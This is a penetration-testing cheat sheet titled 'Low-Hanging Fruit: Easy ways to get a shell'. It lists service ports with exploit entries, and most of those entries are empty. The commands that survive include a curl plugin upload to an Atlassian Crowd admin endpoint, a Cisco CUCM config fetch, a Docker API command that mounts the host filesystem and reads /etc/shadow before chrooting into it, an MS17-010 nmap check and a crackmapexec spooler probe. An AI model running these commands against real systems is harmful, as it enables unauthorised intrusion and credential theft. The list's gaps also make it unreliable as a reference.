Comment on page
Low-Hanging Fruit
Easy ways to get a shell
Ports: 8080
Exploit:
Ports: 5000
Exploit:
Ports: 8088
Exploit:
Ports: 8983
Exploit:
Ports: 6066
Exploit:
Ports: 4990
Exploit:
curl -k -H "Content-Type: multipart/mixed" \ --form "[email protected]" http://[HOST]:4990/crowd/admin/uploadplugin.action
Ports: 4786
Exploit:
Ports: 6970
Exploit:
curl http://[CUCM IP Address]:6970/ConfigFileCacheList.txt
Ports: 6129
Exploit:
Ports: 443
Exploit:
Ports: 2375
Exploit:
docker -H [host]:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
- File Access:
cat /mnt/etc/shadow
- Remote Code Execution:
chroot /mnt
Ports: 4848
Exploit:
Ports: 8500
Exploit:
Ports: 5555, 5556
Exploit:
Ports: 80, 443
Exploit:
Ports: 8880
Exploit:
Ports: 623
Exploit:
Ports: 1090, 1098, 1099, 4444, 11099, 47001, 47002, 10999
Exploit:
Ports: 4444, 4445, 11111
Exploit:
Ports: 5005 - 5009, 45000, 45001
Exploit:
Ports: 8686, 9012, 50500
Exploit:
Ports 139, 445
Exploit:
nmap -Pn -sV --script smb-vuln-ms17-010 -p139,445 $ip
Ports: 9000
Exploit:
crackmapexec smb $host_file -u $username -p $password -M spooler
Ports: 6379
Exploit:
Ports: 3300
Exploit:
Ports: 7000-7004, 7070, 7071, 8000-8003, 9000-9003, 9503
Exploit:
Ports: 8383
Exploit:
Last modified 9mo ago